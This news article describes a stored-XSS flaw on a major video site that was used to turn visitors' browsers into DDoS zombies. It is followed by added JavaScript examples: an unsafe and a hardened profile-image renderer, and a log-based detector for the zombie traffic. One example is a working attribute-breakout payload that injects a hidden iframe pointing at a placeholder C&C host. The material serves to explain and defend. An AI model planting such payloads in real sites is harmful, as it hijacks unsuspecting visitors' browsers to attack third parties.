Silviu

Vulnerability in World's Largest Site Turned Millions of Visitors into DDoS Zombies

[Image: layer-7-ddos-attack-using-xss-flaw.png]

An application layer, or 'layer 7', distributed denial of service (DDoS) attack is one of the most complicated web attacks: it is disguised to look like legitimate traffic but targets specific areas of a website, which makes it even more difficult to detect and mitigate.

Just yesterday, cloud-based security service provider Incapsula detected a unique application layer DDoS attack carried out using traffic hijacking techniques. The attack flooded one of their clients with over 20 million GET requests originating from the browsers of over 22,000 Internet users.

What makes this case especially interesting is that the attack was enabled by a persistent XSS vulnerability in one of the world's largest and most popular sites, one of the domains on Alexa's "Top 50" list.

From XSS Vulnerability to Large-Scale DDoS Attack

Incapsula has not disclosed the name of the vulnerable website for security reasons, but described it as a high-profile video content provider that allows its users to sign up and sign in with their own profiles.

The DDoS attack was enabled by a persistent (stored) XSS vulnerability that allowed the attacker to inject malicious JavaScript code into the tag associated with his profile image.

So each time a legitimate visitor arrived at any of the affected pages (e.g. pages where the attacker had commented from his profile), the attacker's profile image also loaded in the visitor's browser and automatically executed the injected JavaScript, which in turn injected a hidden iframe pointing at the DDoSer's C&C domain.
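The two halves of that mechanism, as an added example that is not code from the article, from Incapsula or from the affected site: a profile-image renderer that splices the user-controlled URL straight into an attribute (the class of bug described above), the kind of stored payload that breaks out of the attribute and plants the hidden iframe, and a hardened renderer that validates the URL and escapes it. The payload, the placeholder C&C page `https://cnc.example/attack.html`, the default avatar path and all function names are constructed for illustration; nothing here is the real site's code or the real attacker's script.

```javascript
// Added example (not from the article, Incapsula or the affected site): how a
// stored XSS in a profile-image tag becomes a DDoS loader, and how attribute
// escaping plus URL validation stops it. Payload, URLs and names are constructed.

// Hypothetical stored payload. It closes the src attribute early and appends an
// onerror handler; the bogus src guarantees the handler fires as soon as the
// page renders. The handler drops a hidden iframe pointing at a placeholder C&C
// page, which is where the actual request-flooding script would live.
const PAYLOAD =
  "x\" onerror=\"var f=document.createElement('iframe');" +
  "f.style.display='none';f.src='https://cnc.example/attack.html';" +
  "document.body.appendChild(f)";

// Vulnerable pattern: user input concatenated into an HTML attribute unescaped.
function renderProfileImageUnsafe(url) {
  return `<img class="avatar" src="${url}">`;
}

// Minimal HTML attribute escaping; every character that can end a quoted
// attribute value or start a tag is turned into an entity.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

const DEFAULT_AVATAR = '<img class="avatar" src="/static/default-avatar.png">';

// Hardened pattern: parse the URL first (garbage such as the payload above is
// rejected outright), allow only http(s), then escape what is emitted.
function renderProfileImageSafe(url) {
  let parsed;
  try {
    parsed = new URL(String(url));
  } catch (e) {
    return DEFAULT_AVATAR;
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') return DEFAULT_AVATAR;
  return `<img class="avatar" src="${escapeAttr(parsed.href)}">`;
}

// Cheap check used by the tests: did an inline event handler make it into the
// generated markup? Real reviews should use an HTML parser, not a regex.
function hasInjectedHandler(html) {
  return /\son[a-z]+\s*=/i.test(html);
}

console.log('unsafe:', renderProfileImageUnsafe(PAYLOAD));
console.log('safe:  ', renderProfileImageSafe(PAYLOAD));
```

The unsafe renderer turns the payload into `<img class="avatar" src="x" onerror="...">`, which every visitor's browser executes; the safe one falls back to the default avatar because the payload is not a parseable URL, and a URL that does parse but carries `"` or whitespace is percent-encoded by the URL parser and entity-escaped on output, so it can no longer close the attribute. Output encoding (escaping) is the control that removes the XSS; the URL allow-list additionally blocks `javascript:` and `data:` sources.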

According to Incapsula, the attackers used an Ajax-script-based DDoS tool that forces the browser to issue a request at a rate of one per second.

"Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length and with thousands of views every minute, the attack can quickly become very large and extremely dangerous." the researchers explained.
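The defender's side of the same arithmetic, as an added example that is not from the article or from Incapsula: a script that reads combined-format web-server log lines and flags clients whose requests to a single path arrive at a machine-like, near-constant interval (one per second in this story), then groups the flagged clients by the page that framed them, since on a browser-based flood the hidden iframe's page shows up as the Referer across thousands of otherwise unrelated users. The log lines, client addresses, paths and the C&C URL `https://cnc.example/attack.html` are constructed; the Referer grouping is a supporting signal only (browsers and Referrer-Policy can strip it), and the cadence check is the primary one.

```javascript
// Added example (not from the article or Incapsula): spotting hijacked browsers
// in web-server logs by their steady request cadence. Log lines, IPs, paths and
// the C&C URL below are constructed for illustration.

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };
// Apache/nginx combined log format: ip ident user [time] "req" status bytes "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// "10/Apr/2014:10:00:00 +0000" -> unix seconds (null if malformed)
function parseClfTime(s) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$/.exec(s);
  if (!m || !(m[2] in MONTHS)) return null;
  const utc = Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]) / 1000;
  const offset = (+m[8] * 3600 + +m[9] * 60) * (m[7] === '+' ? 1 : -1);
  return utc - offset;
}

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const ts = parseClfTime(m[2]);
  if (ts === null) return null;
  return { ip: m[1], ts, method: m[3], path: m[4], status: +m[5], referer: m[6], ua: m[7] };
}

// Flag clients that hit one path at a near-constant interval. period and
// tolerance are seconds; minRequests keeps short bursts from triggering.
function findZombies(lines, { minRequests = 5, period = 1, tolerance = 0.25 } = {}) {
  const byIp = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue;
    if (!byIp.has(r.ip)) byIp.set(r.ip, []);
    byIp.get(r.ip).push(r);
  }
  const zombies = [];
  for (const [ip, reqs] of byIp) {
    if (reqs.length < minRequests) continue;
    reqs.sort((a, b) => a.ts - b.ts);
    const paths = new Set(reqs.map(r => r.path));
    let steady = true;
    for (let i = 1; i < reqs.length && steady; i++) {
      if (Math.abs(reqs[i].ts - reqs[i - 1].ts - period) > tolerance) steady = false;
    }
    if (steady && paths.size === 1) {
      zombies.push({ ip, path: reqs[0].path, referers: [...new Set(reqs.map(r => r.referer))],
                     requests: reqs.length });
    }
  }
  return zombies;
}

// Which page framed the flagged clients? Sorted by count; the C&C page leads.
function sharedReferers(zombies) {
  const counts = new Map();
  for (const z of zombies) for (const ref of z.referers) counts.set(ref, (counts.get(ref) || 0) + 1);
  return [...counts].sort((a, b) => b[1] - a[1]);
}

// ---- constructed sample log -------------------------------------------------
function fmtClf(epoch) {
  const d = new Date(epoch * 1000);
  const p = n => String(n).padStart(2, '0');
  const mon = Object.keys(MONTHS)[d.getUTCMonth()];
  return `${p(d.getUTCDate())}/${mon}/${d.getUTCFullYear()}:` +
         `${p(d.getUTCHours())}:${p(d.getUTCMinutes())}:${p(d.getUTCSeconds())} +0000`;
}
function logLine(ip, ts, path, referer) {
  return `${ip} - - [${fmtClf(ts)}] "GET ${path} HTTP/1.1" 200 4096 "${referer}" "Mozilla/5.0"`;
}
const T0 = Date.UTC(2014, 3, 10, 10, 0, 0) / 1000;
const CNC = 'https://cnc.example/attack.html';          // placeholder C&C page
const SAMPLE_LOG = [];
// three hijacked browsers: one request per second to the same page, framed by the C&C page
for (const ip of ['203.0.113.7', '198.51.100.23', '192.0.2.99']) {
  for (let i = 0; i < 6; i++) SAMPLE_LOG.push(logLine(ip, T0 + i, '/video/watch?id=1', CNC));
}
// one human: irregular gaps, several pages, referer is the site itself
for (const [dt, path] of [[0, '/'], [7, '/video/watch?id=1'], [9, '/video/watch?id=2'],
                          [30, '/comments'], [31, '/video/watch?id=2']]) {
  SAMPLE_LOG.push(logLine('203.0.113.50', T0 + dt, path, 'https://video.example/'));
}

console.log(findZombies(SAMPLE_LOG));
console.log(sharedReferers(findZombies(SAMPLE_LOG)));
```

The point of grouping by Referer is that blocking 22,000 home IP addresses is the wrong response: the visitors are victims, the iframe source is the single thing every zombie has in common, and a rule keyed on that (or on the stored profile payload once it is found) removes the whole flood at once. An attacker can add jitter to the cadence, which is what the `tolerance` knob is for; widen it and raise `minRequests` together.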

Source: The Hacker News
